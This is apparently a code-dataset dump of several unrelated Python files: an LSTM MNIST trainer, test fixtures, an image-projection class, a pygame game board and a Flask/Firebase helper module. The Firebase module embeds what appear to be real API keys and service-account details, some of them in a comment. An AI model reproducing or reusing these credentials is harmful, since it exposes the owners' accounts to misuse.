main()\n","sub_path":"ex07-fa/ex07-fa.py","file_name":"ex07-fa.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"29795340","text":"# Most code inspired from\n# https://github.com/aymericdamien/TensorFlow-Examples/blob/master/examples/3_NeuralNetworks/recurrent_network.py\nimport tensorflow as tf\nimport os\n#from tensorflow.python.ops import rnn, rnn_cell, rnn_cell_impl\nfrom tensorflow.contrib import rnn # copied from Damien Aymeric\nimport numpy as np\n\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nresult_dir='results/LSTM/RNN/2/'\n# call mnist function\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\nlearningRate = 1e-4\ntrainingIters = 50000\nbatchSize = 100\ndisplayStep = 20\n\nnInput = 28 # we want the input to take the 28 pixels\nnSteps = 28 # every 28\nnHidden = 128 # number of neurons for the RNN\nnClasses = 10 # this is MNIST so you know\n\nx = tf.placeholder('float', [None, nSteps, nInput])\ny = tf.placeholder('float', [None, nClasses])\n\nweights = {\n 'out': tf.Variable(tf.random_normal([nHidden, nClasses]))\n}\n\nbiases = {\n 'out': tf.Variable(tf.random_normal([nClasses]))\n}\n\n\ndef RNN(x, weights, biases):\n # current code from Damien Aymeric\n x = tf.unstack(x, nSteps, 1)\n\n # Define a lstm cell with tensorflow\n lstm_cell = rnn.BasicLSTMCell(nHidden, forget_bias=1.0)\n\n # Get lstm cell output\n outputs, states = rnn.static_rnn(lstm_cell, x, dtype=tf.float32)\n\n # Linear activation, using rnn inner loop last output\n return tf.matmul(outputs[-1], weights['out']) + biases['out']\n\npred = RNN(x, weights, biases)\n\n# optimization\n# create the cost, optimization, evaluation, and 
accuracy\n# for the cost softmax_cross_entropy_with_logits seems really good\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=pred))\noptimizer = tf.train.AdamOptimizer(learning_rate=learningRate).minimize(cost)\n\ncorrectPred = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))\naccuracy = tf.reduce_mean(tf.cast(correctPred, tf.float32))\n\n# Add a scalar summary for the snapshot loss.\ntf.summary.scalar(cost.op.name, cost)\ntf.summary.scalar('accuracy', accuracy) # to plot train accuracy\n\n# Build the summary operation based on the TF collection of Summaries.\nsummary_op = tf.summary.merge_all()\n\n# Add the variable initializer Op.\ninit = tf.global_variables_initializer() # sess.run()?\n\n# Create a saver for writing training checkpoints.\nsaver = tf.train.Saver()\n\n\n\n\nwith tf.Session() as sess:\n sess.run(init)\n # Instantiate a SummaryWriter to output summaries and the Graph.\n summary_writer = tf.summary.FileWriter(result_dir, sess.graph)\n step = 1\n\n while (step * batchSize) < trainingIters:\n # print('hi, this is iteration ', step, 'of the while loop')\n batchX, batchY = mnist.train.next_batch(batchSize) # mnist has a way to get the next batch\n batchX = batchX.reshape((batchSize, nSteps, nInput))\n\n sess.run(optimizer, feed_dict={x: batchX, y: batchY})\n\n if step % displayStep == 0:\n acc = sess.run(accuracy, feed_dict={x: batchX, y: batchY})\n loss = sess.run(cost, feed_dict={x: batchX, y: batchY})\n print(\"Iter \" + str(step * batchSize) +\n \", Minibatch Loss= \" +\n \"{:.6f}\".format(loss) + \", Training Accuracy= \" +\n \"{:.5f}\".format(acc))\n # Update the events file which is used to monitor the training (in this case,\n # only the training loss is monitored)\n summary_str = sess.run(summary_op, feed_dict={x: batchX, y: batchY})\n summary_writer.add_summary(summary_str, step*batchSize)\n summary_writer.flush()\n checkpoint_file = os.path.join(result_dir, 'checkpoint')\n saver.save(sess, checkpoint_file, global_step=step*batchSize)\n step += 1\n print('Optimization finished')\n\n testData = mnist.test.images.reshape((-1, nSteps, nInput))\n testLabel = mnist.test.labels\n print(\"Testing Accuracy:\",\n sess.run(accuracy, feed_dict={x: testData, y: testLabel}))","sub_path":"assignment2/lstmMNIST_BasicLSTMCell.py","file_name":"lstmMNIST_BasicLSTMCell.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"330205340","text":"import pytest\nimport pandas as pd\n\nimport calkx.data\n\n\n@pytest.fixture\ndef postgresdb(conn):\n c = conn.cursor()\n c.execute(\n \"\"\"INSERT INTO skyscraper_spiders\n (name, project_id, code, recurrency_minutes)\n VALUES (\n 'samplespider',\n (SELECT project_id FROM projects WHERE name = 'test-project'),\n '',\n 60\n )\"\"\")\n c.execute(\n \"\"\"INSERT INTO skyscraper_spiders_results\n (item_id, spider_id, payload, crawl_date)\n VALUES (\n '6acc3df8-1879-42e6-ac1a-06c55321722d',\n (SELECT spider_id FROM skyscraper_spiders WHERE name = 'samplespider'),\n '{\"data\": {\"my-field\": \"my-data\"}, \"url\": \"http://example.com\", \"spider\": \"samplespider\", \"crawl_time\": \"2018-03-06T18:06:25Z\"}',\n NOW())\"\"\")\n conn.commit()\n\n yield conn\n\n\ndef test_can_read_data_for_spider(postgresdb):\n data = calkx.data.read_spiders_results(\n 'test-project', ['samplespider'], postgresdb)\n\n assert isinstance(data, pd.DataFrame)\n assert len(data) == 1\n assert data['url'][0] == 'http://example.com'\n assert 
data['spider'][0] == 'samplespider'\n assert data['crawl_time'][0] == '2018-03-06T18:06:25Z'\n assert data['my-field'][0] == 'my-data'\n","sub_path":"tests/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"493537851","text":"\"\"\"\r\n=======================================================\r\nCourse: CS4243.\r\nCourse Title: Computer Vision & Pattern Recognition.\r\nProject: CS4243 Project on 3D Walk-through of 2D Image.\r\nGroup Members: Dave Tan Woo Hong (A0106505R)\r\n Desmond Lim Hock Yeam (A0106477B)\r\n Toh Zijing (A0123506R)\r\n Darren Boo Kuok Liang (A0087547N)\r\n=======================================================\r\n======= ========== =========== ============================================\r\nVersion Date Modified By Details\r\n======= ========== =========== ============================================\r\n1.0.0 26/10/2014 Dave Tan Initial Version of Image Class\r\n incorporating the Methods: __init__,\r\n persproj, plotproj.\r\n\"\"\"\r\nimport platform\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nclass Image:\r\n \"\"\"\r\n ************\r\n Class Image.\r\n ************\r\n =========\r\n Sypnosis.\r\n =========\r\n This is a Class representing the Image Object.\r\n\r\n ========\r\n Methods.\r\n ========\r\n __init__: This is the Constructor Method for Class Image.\r\n \r\n persproj: This Method performs the Perspective Projection and returns the 2D\r\n Array containing the Projected Points.\r\n\r\n plotproj: This Method names the Plot of the 2 x 2 SubPlots according to the\r\n Title provided. This Function is used to plot the Perspective Projection of\r\n 4 Frames.\r\n \"\"\"\r\n\r\n #======================\r\n #Properties/Attributes.\r\n #======================\r\n intAttribute = None\r\n\r\n #========\r\n #Methods.\r\n #========\r\n def __init__(self, project_window, image_path):\r\n #===================\r\n #Constructor Method.\r\n #===================\r\n if platform.system() == \"Darwin\":\r\n self._image = cv2.imread(image_path, cv2.CV_LOAD_IMAGE_COLOR)[::-1,::-1]\r\n else:\r\n self._image = cv2.imread(image_path, cv2.CV_LOAD_IMAGE_COLOR)\r\n self._view = self._image[:]\r\n self._view_scale = 0.65\r\n\r\n # stores x,y,z world coords for each point\r\n self._image_points = self._image.astype(np.int)\r\n self._image_points *= 0\r\n\r\n self.intAttribute = 1\r\n\r\n def getView(self):\r\n \"\"\"\r\n Returns a copy of current view\r\n \"\"\"\r\n return cv2.resize(self._view, (0,0),\r\n fx=self._view_scale,\r\n fy=self._view_scale)\r\n\r\n def getWidth(self):\r\n return self._image.shape[1]\r\n\r\n def getHeight(self):\r\n return self._image.shape[0]\r\n\r\n def getViewScale(self):\r\n return self._view_scale\r\n\r\n def getCoordsFor(self, x, y):\r\n return self._image_points[y][x]\r\n\r\n def setZFor(self, zValue, x, y ):\r\n self._image_points[y][x][-1] = zValue\r\n\r\n def convertToImageSpace(self, x, y):\r\n x *= 1.0/self._view_scale\r\n y *= 1.0/self._view_scale\r\n return (int(x), int(y))\r\n\r\n def convertToViewSpace(self, x, y):\r\n x *= self._view_scale\r\n y *= self._view_scale\r\n return (int(x), int(y))\r\n\r\n def persproj(self, array3DScPts, arrayCamTrans, matCamOrient, int_f = 1,\r\n int_u0 = 0, int_bu = 1, int_ku = 1, int_v0 = 0, int_bv = 1,\r\n int_kv = 1):\r\n #===============\r\n #Initialisation.\r\n #===============\r\n import numpy as np\r\n i_f = np.transpose(matCamOrient[0, :])\r\n j_f = 
np.transpose(matCamOrient[1, :])\r\n k_f = np.transpose(matCamOrient[2, :])\r\n ufp = []\r\n vfp = []\r\n intRows = array3DScPts.shape[0]\r\n matProjPts = np.zeros([1, 2])\r\n\r\n for intRowIndex in range(0, intRows, 1):\r\n #===============================\r\n #Extract Current 3D Coordinates.\r\n #===============================\r\n listCurrent3DPt = array3DScPts[intRowIndex, :]\r\n sp_minus_tf = listCurrent3DPt - arrayCamTrans\r\n\r\n #====\r\n #ufp.\r\n #====\r\n fltNumerator = int_f * np.dot(np.transpose(sp_minus_tf), i_f)\r\n fltDenominator = np.dot(np.transpose(sp_minus_tf), k_f)\r\n ufp = (fltNumerator / fltDenominator) * int_bu + int_u0\r\n \r\n #====\r\n #vfp.\r\n #==== \r\n fltNumerator = int_f * np.dot(np.transpose(sp_minus_tf), j_f)\r\n fltDenominator = np.dot(np.transpose(sp_minus_tf), k_f)\r\n vfp = (fltNumerator / fltDenominator) * int_bv + int_v0\r\n\r\n #=============================\r\n #Store the Projected 2D Point.\r\n #=============================\r\n if(intRowIndex == 0):\r\n #=========================\r\n #First Projected 2D Point.\r\n #=========================\r\n matProjPts = [ufp, vfp]\r\n else:\r\n #=========================\r\n #Subsequent Rotated Point.\r\n #=========================\r\n matProjPts = np.append(matProjPts, [ufp, vfp])\r\n\r\n #==========================\r\n #Return the 2D Coordinates.\r\n #==========================\r\n matProjPts = np.matrix(matProjPts)\r\n intRows = matProjPts.shape[0]\r\n intColumns = matProjPts.shape[1]\r\n intElements = intRows * intColumns\r\n intNewRows = int(intElements / 2)\r\n matProjPts = np.reshape(matProjPts, (intNewRows, 2))\r\n return(matProjPts)\r\n\r\n def plotproj(self, strPlotTitle, arrayFr1PersProj, arrayFr2PersProj,\r\n arrayFr3PersProj, arrayFr4PersProj):\r\n #===============\r\n #Initialisation.\r\n #===============\r\n import matplotlib\r\n import matplotlib.pyplot as plt\r\n plt.suptitle(strPlotTitle)\r\n\r\n #=======================================================\r\n #Build the Subplots comprising the 3D-to-2D Projections.\r\n #=======================================================\r\n for i in range(1, 5):\r\n #======================\r\n #Configure the Subplot.\r\n #======================\r\n plt.subplot(2, 2, i)\r\n plt.title(\"Frame \" + str(i))\r\n plt.xlabel(\"X\")\r\n plt.ylabel(\"Y\")\r\n x = eval(\"arrayFr\" + str(i) + \"PersProj[:, 0]\")\r\n y = eval(\"arrayFr\" + str(i) + \"PersProj[:, 1]\")\r\n \r\n #=================\r\n #Draw the Subplot.\r\n #=================\r\n plt.plot(x, y, 'r.')\r\n\r\n #======================================================\r\n #Display the 3D-to-2D Projection Plot for the 4 Frames.\r\n #======================================================\r\n plt.show()\r\n\r\n \r\n\r\n \r\n","sub_path":"cs4243/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"518861870","text":"from unittest.mock import (\n NonCallableMock,\n patch,\n)\n\nimport pytest\n\nfrom syrupy.constants import DISABLE_COLOR_ENV_VAR\nfrom syrupy.terminal import (\n bold,\n context_style,\n error_style,\n green,\n received_diff_style,\n received_style,\n red,\n reset,\n snapshot_diff_style,\n snapshot_style,\n success_style,\n warning_style,\n yellow,\n)\n\n\ndef test_colors_off_does_not_call_colored():\n \"\"\"\n Test that disabling colors prevents instantiating colored object.\n Enables workarounds for when instantiating the colored object causes crashes,\n see issue #633\n 
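\n A user-level workaround sketch (DISABLE_COLOR_ENV_VAR is the real constant imported at the top of this file; the \"true\" value mirrors the patch in the test body below):\n\n import os\n from syrupy.constants import DISABLE_COLOR_ENV_VAR\n os.environ[DISABLE_COLOR_ENV_VAR] = \"true\" # disable colors before any style call\n 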
\"\"\"\n\n with patch(\n \"syrupy.terminal.colored.colored.__init__\", new_callable=NonCallableMock\n ):\n with patch.dict(\"os.environ\", {DISABLE_COLOR_ENV_VAR: \"true\"}):\n for method in (\n reset,\n red,\n yellow,\n green,\n bold,\n error_style,\n warning_style,\n success_style,\n snapshot_style,\n snapshot_diff_style,\n received_style,\n received_diff_style,\n context_style,\n ):\n _ = method(\"foo\")\n\n # Prevent test from accidentally passing by patching wrong object\n with pytest.raises(TypeError) as excinfo:\n _ = red(\"foo\")\n\n assert \"NonCallableMock\" in str(excinfo.value)\n","sub_path":"tests/syrupy/test_terminal.py","file_name":"test_terminal.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"40166745","text":"# MODULES\nimport pygame, sys\nimport numpy as np\nimport random\nimport time\nfrom copy import deepcopy as dcopy\n\n# initializes pygame\n\n# ---------\n# CONSTANTS\n# ---------\n\n# rgb: red green blue\nRED = (255, 0, 0)\nBG_COLOR = (231, 225, 232)\nLINE_COLOR = (0, 0, 0)\nCIRCLE_COLOR = (239, 231, 200)\nCROSS_COLOR = (66, 66, 66)\n \nclass Screen():\n def __init__(self, env):\n if env.show_screen:\n pygame.init()\n self.env = env\n self.WIDTH = 800\n self.HEIGHT = 800\n self.LINE_WIDTH = 1\n self.SQUARE_SIZE = int(self.HEIGHT / 20)\n self.color_A = (255, 172, 88)\n self.color_B = (129, 188, 255)\n if env.show_screen:\n self.load_image()\n pygame.display.set_caption( 'ProCon-2020' ) \n\n def render(self):\n pygame.display.update()\n\n def load_image(self):\n self.agent_A_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/agent1.png'), (self.SQUARE_SIZE, self.SQUARE_SIZE))\n self.agent_B_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/agent2.png'), (self.SQUARE_SIZE, self.SQUARE_SIZE))\n self.wall_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/wall.jpg'), (self.SQUARE_SIZE, self.SQUARE_SIZE))\n self.background_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/background.jpg'), (626, 966))\n self.table_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/board.png'), (400, 350))\n self.treasure_img = pygame.transform.scale(\n pygame.image.load('GameBoard/images/treasure.jpg'),\n (int(self.SQUARE_SIZE / 2), int(self.SQUARE_SIZE / 2))) \n \n def coord(self, x, y):\n return x * self.SQUARE_SIZE, y * self.SQUARE_SIZE\n \n def setup(self, env): \n self.h = env.height\n self.w = env.width\n self.screen = pygame.display.set_mode(self.coord(self.h + 8, self.w)) \n self.screen.fill( BG_COLOR )\n self.draw_lines()\n self.screen.blit(self.background_img, self.coord(self.h, 0))\n for i in range(self.h):\n for j in range(self.w):\n # draw wall\n if self.env.wall_board[i][j] == 1:\n self.draw_wall(i, j)\n else:\n self.reset_square([i, j], -1)\n \n # draw treasure\n if self.env.treasure_board[i][j] > 0:\n self.show_treasure_value(self.env.norm_treasure_board[i][j], i, j)\n \n # draw agent\n for player_id in range(self.env.num_players):\n for agent_ID in range(self.env.n_agents):\n self.draw_squares(self.env.agent_pos[player_id][agent_ID], player_id)\n self.reset_square(self.env.agent_pos[player_id][agent_ID], player_id, agent_ID)\n \n self.show_score()\n pygame.display.update()\n\n def start(self):\n game_over = False\n # -------\n \n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n \n if event.type == pygame.MOUSEBUTTONDOWN and not 
game_over:\n sys.exit()\n # mouseX = event.pos[0] # x\n # mouseY = event.pos[1] # y\n \n # clicked_row = int(mouseY // self.SQUARE_SIZE)\n # clicked_col = int(mouseX // self.SQUARE_SIZE)\n \n \n pygame.display.update()\n \n def show_score(self):\n self.screen.blit(self.table_img, self.coord(self.h - 1, -2))\n \n myFont = pygame.font.SysFont(\"Times New Roman\", 30)\n \n color = (255, 178, 21)\n \n SA = myFont.render(\" : \" + str(round(self.env.players[0].total_score)), 0, color)\n SB = myFont.render(\" : \" + str(round(self.env.players[1].total_score)), 0, color)\n STurns = myFont.render(\"Turns: \" + str(self.env.remaining_turns), 0, color)\n \n \n self.screen.blit(SA, self.coord(self.h + 1, 1))\n self.screen.blit(SB, self.coord(self.h + 1, 2))\n self.screen.blit(STurns, self.coord(self.h + 1, 3))\n self.screen.blit(self.agent_A_img, (self.h * self.SQUARE_SIZE + 30, -5 + 1 * self.SQUARE_SIZE))\n self.screen.blit(self.agent_B_img, (self.h * self.SQUARE_SIZE+ 30, -5 + 2 * self.SQUARE_SIZE))\n \n def show_value(self, value, x, y):\n myFont = pygame.font.SysFont(\"Times New Roman\", 20)\n value = round(value)\n pos = 5\n if value >= 0 and value < 10:\n pos = 15\n elif value > 10 or value > -10:\n pos = 10\n value = myFont.render(str(value), 1, (0, 0, 0))\n self.screen.blit(value, (x * self.SQUARE_SIZE + pos, y * self.SQUARE_SIZE + 8))\n \n def show_index_agent(self, x, y, agent_ID):\n myFont = pygame.font.SysFont(\"Times New Roman\", 13)\n agent_ID = myFont.render(str(abs(agent_ID)), 1, (0, 111, 220))\n \n self.screen.blit(agent_ID, (x * self.SQUARE_SIZE + 17, y * self.SQUARE_SIZE + 20))\n \n \n def show_treasure_value(self, value, x, y):\n self.draw_treasure(x, y)\n value = round(value)\n myFont = pygame.font.SysFont(\"Times New Roman\", 13)\n value = myFont.render(str(value), 1, (255, 0, 0))\n self.screen.blit(value, (x * self.SQUARE_SIZE + 2, y * self.SQUARE_SIZE + int(self.SQUARE_SIZE * 5 / 7)))\n \n def draw_wall(self, x, y):\n self.screen.blit(self.wall_img, self.coord(x, y))\n \n def draw_treasure(self, x, y):\n self.screen.blit(self.treasure_img, self.coord(x, y))\n \n def draw_agent(self, x, y, player_ID, agent_ID):\n player_img = self.agent_A_img if player_ID == 0 else self.agent_B_img\n self.screen.blit(player_img, self.coord(x, y))\n self.show_index_agent(x, y, agent_ID + 1)\n \n \n def draw_lines(self):\n for i in range(self.w):\n pygame.draw.line(self.screen, LINE_COLOR, (0, i * self.SQUARE_SIZE), \n (self.h * self.SQUARE_SIZE, i * self.SQUARE_SIZE), self.LINE_WIDTH )\n for i in range(self.h):\n pygame.draw.line(self.screen, LINE_COLOR, (i * self.SQUARE_SIZE, 0),\n (i * self.SQUARE_SIZE, self.w * self.SQUARE_SIZE), self.LINE_WIDTH )\n \n def _draw_squares(self, x1, y1, x2, y2, player_ID):\n color = self.color_A if player_ID == 0 else self.color_B\n pygame.draw.rect(self.screen, color, (x1, y1, x2, y2))\n \n \n def draw_squares(self, coord, player_ID):\n x, y = coord\n self._draw_squares(2 + x * self.SQUARE_SIZE, 2 + y * self.SQUARE_SIZE,\n (self.SQUARE_SIZE - 3), (self.SQUARE_SIZE - 3), player_ID)\n \n def _redraw_squares(self, x1, y1, x2, y2, player_ID):\n color = self.color_A if player_ID == 0 else self.color_B\n pygame.draw.rect(self.screen, color, (x1, y1, x2, y2))\n \n \n def redraw_squares(self, x, y, player_ID):\n self._redraw_squares(2 + x * self.SQUARE_SIZE, 2 + y * self.SQUARE_SIZE,\n (self.SQUARE_SIZE - 3), (self.SQUARE_SIZE - 3), player_ID)\n self.show_value(self.env.norm_score_board[x][y], x, y)\n \n def _reset_squares(self, x1, y1, x2, y2, player_ID):\n color = 
self.color_A if player_ID == 0 else self.color_B\n if player_ID < 0:\n color = BG_COLOR\n pygame.draw.rect(self.screen, color, (x1, y1, x2, y2))\n \n def reset_square(self, coord, player_ID, agent_ID = 0):\n x, y = coord\n self._reset_squares(2 + x * self.SQUARE_SIZE, 2 + y * self.SQUARE_SIZE,\n (self.SQUARE_SIZE - 3), (self.SQUARE_SIZE - 3), player_ID)\n if player_ID >= 0:\n self.draw_agent(x, y, player_ID, agent_ID)\n else:\n self.show_value(self.env.norm_score_board[x][y], x, y)\n \n def reset(self):\n self.screen.fill( BG_COLOR )\n # self.draw_lines()\n self.screen.blit(self.background_img, self.coord(self.h, 0))\n # self.screen.blit(self.background_img, self.coord(20, 0))\n self.draw_lines()\n for i in range(self.h):\n for j in range(self.w):\n # draw wall\n if self.env.wall_board[i][j] == 1:\n self.draw_wall(i, j)\n else:\n self.reset_square([i, j], -1, 0)\n \n # draw treasure\n if self.env.treasure_board[i][j] > 0:\n self.show_treasure_value(self.env.norm_treasure_board[i][j], i, j)\n \n # draw agent\n for player_id in range(self.env.num_players):\n for agent_ID in range(self.env.n_agents):\n self.draw_squares(self.env.agent_pos[player_id][agent_ID], player_id)\n self.reset_square(self.env.agent_pos[player_id][agent_ID], player_id, agent_ID)\n \n self.show_score()","sub_path":"GameBoard/game_board.py","file_name":"game_board.py","file_ext":"py","file_size_in_byte":9263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"422397488","text":"#!/usr/bin/python\n\"\"\"\nCommon python functions for YON\n\"\"\"\nimport threading\n#from cgi import parse_qs\nfrom flask import session, current_app\nfrom functools import wraps\nimport json\nimport base64\nimport tempfile\nimport pyrebase\nfrom ConfigParser import ConfigParser\n\nclass ReturnValue:\n def __init__(self, status, data):\n self.status = status\n self.data = data\n\ndef be_get_jsonUser_data(user_id):\n \"\"\" return the current user object \"\"\"\n db_con = Common().firebase.database()\n user_json = None\n try:\n user_json = db_con.child('users', 'active', user_id).get().val()\n #current_app.logger.debug('be_get_jsonUser_data with json data {0}'.format(user_json))\n if 'contacts' in user_json:\n user_json.pop('contacts')\n if 'groups' in user_json:\n user_json.pop('groups')\n if 'in_there_contacts' in user_json:\n user_json.pop('in_there_contacts')\n if 'pn_token' in user_json:\n user_json.pop('pn_token')\n if 'image_64' in user_json:\n user_json.pop('image_64')\n if 'image' in user_json:\n user_json.pop('image')\n # check for image\n image_path = 'images/users/{0}/image'.format(user_id)\n image_url = be_common_get_image_url(image_path)\n if image_url is not None:\n user_json['image_url'] = image_url\n except IOError:\n current_app.logger.debug('be_get_jsonUser_data: user does not exist')\n except Exception:\n current_app.logger.debug('be_get_jsonUser_data: failed to read user')\n return user_json\n\n\n\nclass FuncThread(threading.Thread):\n \"\"\" init a new thread - the constructor takes the target function and its arguments \"\"\"\n def __init__(self, target, *args):\n self._target = target\n self._args = args\n threading.Thread.__init__(self)\n def run(self):\n self._target(*self._args)\n\n\ndef get_member_full_name(member_id, user_id):\n \"\"\" get the member full name based on the user contacts \"\"\"\n db_con = Common().firebase.database()\n user_data = db_con.child('users', 'active', user_id).get().val()\n #current_app.logger.debug(user_data)\n if 'contacts' in user_data:\n user_contacts = user_data['contacts']\n if 
member_id in user_contacts.keys():\n full_name = user_contacts[member_id]['full_name']\n else:\n full_name = \"\"\n else:\n full_name = \"\"\n return full_name\n\ndef get_user_data(user=None):\n \"\"\" return the current user object \"\"\"\n #from YON.user import get_user_image\n #user = get_user_from_session()\n db_con = Common().firebase.database()\n #storage_con = Common().firebase.storage()\n user_db = db_con.child('users', 'active', user).get().val()\n nickname = user_db['nickname']\n country_code = user_db['country_code']\n phone = user_db['phone']\n status = user_db['status']\n #buser_image = user_db['image']\n image_path = 'images/users/{0}/image'.format(user)\n image_url = be_common_get_image_url(image_path)\n current_app.logger.debug('user: {0}, image url: {1}'.format(phone, image_url))\n img_url = \"\"\n if image_url is not None:\n img_url = image_url\n\n # img_url = \"\"\n # if buser_image is True:\n # #image_path = 'images/users/{0}/image'.format(user)\n # img_url = '/user/image/get'#storage_con.child(image_path).get_url(None)\n #str_image64 = img_url\n #if buser_image is True:\n # str_image64 = get_user_image(user)\n #user_data = {'status':status, 'nickname':nickname, 'country_code':country_code, 'phone':phone,\\\n # 'image':str_image64}\n user_data = {'status':status, 'nickname':nickname, 'country_code':country_code, 'phone':phone,\\\n 'image_url':img_url}\n return user_data\n\ndef ret_json_err_code(code, err_desc, ui_msg):\n \"\"\" Return error status in json format\"\"\"\n return json.dumps({'status':{'code':code, 'error':err_desc, 'msg':ui_msg}, 'data':''})\n\ndef ret_json_err_code_with_data(code, err_desc, ui_msg, data):\n \"\"\" Return error status in json format\"\"\"\n return json.dumps({'status':{'code':code, 'error':err_desc, 'msg':ui_msg}, 'data':data})\n\n\ndef ret_json_with_object(obj=None):\n \"\"\" build the return for the post method \"\"\"\n #json_str = json.dumps({'status':{'code':0, 'error':'', 'msg':''}, 'data':obj})\n #json_comp = zlib.compress(json_str)\n #return json_comp\n return json.dumps({'status':{'code':0, 'error':'', 'msg':''}, 'data':obj})\n\ndef get_user_from_session():\n \"\"\" return the user from session \"\"\"\n if 'phone' in session:\n ses = str(session['phone'])\n user = ses.replace(\" \", \"\")\n else:\n user = \"\"\n return user\n\ndef get_user_token():\n \"\"\" return the auth token from the session \"\"\"\n if 'token' in session:\n #ses = str(session['token'])\n #token = ses.replace(\" \", \"\")\n token = session['token']\n else:\n token = None\n return token\n\ndef be_common_get_image_obj(image_path):\n \"\"\" get image by path \"\"\"\n storage = Common().firebase.storage()\n image = None\n try:\n image = storage.child(image_path)\n except AttributeError as e:\n current_app.logger.debug('image path does not exist: {0}'.format(e))\n #it returns the image object\n return image\n\ndef be_common_get_image_url(image_path):\n \"\"\" get the image download URL by path \"\"\"\n storage = Common().firebase.storage()\n url = None\n try:\n url = storage.child(image_path).get_url(get_user_token())\n except AttributeError as e:\n current_app.logger.debug('image path does not exist: {0}'.format(e))\n #it returns the download URL\n return url\n \n\ndef get_image(image_path):\n \"\"\" get image by path \"\"\"\n storage = Common().firebase.storage()\n image = None\n try:\n image = storage.child(image_path)\n except AttributeError as e:\n current_app.logger.debug('image path does not exist: {0}'.format(e))\n #it returns the image object\n return image\n\n\ndef be_set_image_toStorage(image_path, image_64):\n \"\"\" save the base64-encoded image to storage 
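by path.\n\n Usage sketch (the path format follows the image_path values used elsewhere in\n this module; image_64_str stands for a hypothetical base64-encoded string):\n\n be_set_image_toStorage('images/users/<uid>/image', image_64_str)\n\n The decoded image is written to Firebase storage 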
by path \"\"\"\n storage = Common().firebase.storage()\n temp_local_path = tempfile.NamedTemporaryFile()\n f_desc = open(temp_local_path.name, \"w\")\n f_desc.write(base64.decodestring(image_64))\n f_desc.close()\n #user = get_user_from_session()\n storage.child(image_path).put(temp_local_path.name, None)\n return True\n\n\n\ndef set_image(image_path, image_64):\n \"\"\" get image by path \"\"\"\n storage = Common().firebase.storage()\n temp_local_path = tempfile.NamedTemporaryFile()\n f_desc = open(temp_local_path.name, \"w\")\n f_desc.write(base64.decodestring(image_64))\n f_desc.close()\n #user = get_user_from_session()\n storage.child(image_path).put(temp_local_path.name, None)\n return True\n\n\ndef login_required(func):\n \"\"\" login check decorator \"\"\"\n @wraps(func)\n def decorated_function(*args, **kwargs):\n \"\"\" Decorator for login \"\"\"\n if not session.has_key('phone'):\n current_app.logger.debug('no phone in session')\n return ret_json_err_code('99', 'not loged in', 'Please login')\n elif session['phone'] is None:\n current_app.logger.debug('phone is empty-not loged in')\n return ret_json_err_code('98', 'not loged in', 'Please login')\n elif check_user_exist(session['phone']) == False:\n return ret_json_err_code('97', 'user not exist', 'user not exist')\n return func(*args, **kwargs)\n return decorated_function\n\n\nAPP_NAME = 'YON'\n\nclass Singleton(type):\n \"\"\" Metaclass for singleton \"\"\"\n def __init__(cls, name, bases, dictionary):\n super(Singleton, cls).__init__(name, bases, dictionary)\n cls.instance = None\n\n def __call__(cls, *args, **kw):\n if cls.instance is None:\n cls.instance = super(Singleton, cls).__call__(*args, **kw)\n return cls.instance\n\n\nclass Common(object):\n \"\"\" Common class for app \"\"\"\n __metaclass__ = Singleton\n firebase = None\n dummy_var = 0\n\n def connect_to_firebase(self):\n \"\"\" Connecting and returning firebase \"\"\"\n #import pyrebase\n\t#config = ConfigParser()\n\t#config.read('/home/ubuntu/YON/secret/firebase_conf.conf')\n\t#fb_conf = dict(config.items('dev'))\n # dev_config = {\n # \"apiKey\": \"AIzaSyBoKcClZzYl1gLE4XirQaaJQCtEwxwUYcg\",\n # \"authDomain\": \"koloodev.firebaseapp.com\",\n # \"databaseURL\": 'https://koloodev.firebaseio.com/',\n # \"storageBucket\": \"koloodev.appspot.com\",\n # #\"serviceAccount\": \"/home/ubuntu/YON/secret/koloodev-firebase-adminsdk-dnjii-c54f273342.json\"\n # \"serviceAccount\": \"/home/ubuntu/YON/secret/yorn-51648-firebase-adminsdk-14e3q-480d634a22.json\"\n # }\n config = {\n \"apiKey\": \"firebase-adminsdk-14e3q@yorn-51648.iam.gserviceaccount.com\",\n \"authDomain\": \"yorn-51648.firebaseapp.com\",\n \"databaseURL\": 'https://yorn-51648.firebaseio.com/',\n \"storageBucket\": \"yorn-51648.appspot.com\",\n \"serviceAccount\": \"/home/ubuntu/YON/secret/yorn-51648-firebase-adminsdk-14e3q-480d634a22.json\"\n } \n #self.firebase = pyrebase.initialize_app(fb_conf)\n self.firebase = pyrebase.initialize_app(config)\n\n def get_con(self):\n \"\"\" Get connection \"\"\"\n if self.firebase is None:\n self.connect_to_firebase()\n return self.firebase.database()\n\n def get_auth_con(self):\n \"\"\" Get connection \"\"\"\n if self.firebase is None:\n self.connect_to_firebase()\n return self.firebase.auth()\n\n def __init__(self):\n self.get_con()\n\n #def parse_vars(self, env):\n # \"\"\" Get environment and return post vars \"\"\"\n # try:\n # request_body_size = int(env.get('CONTENT_LENGTH', 0))\n # except ValueError:\n # request_body_size = 0\n # request_body = 
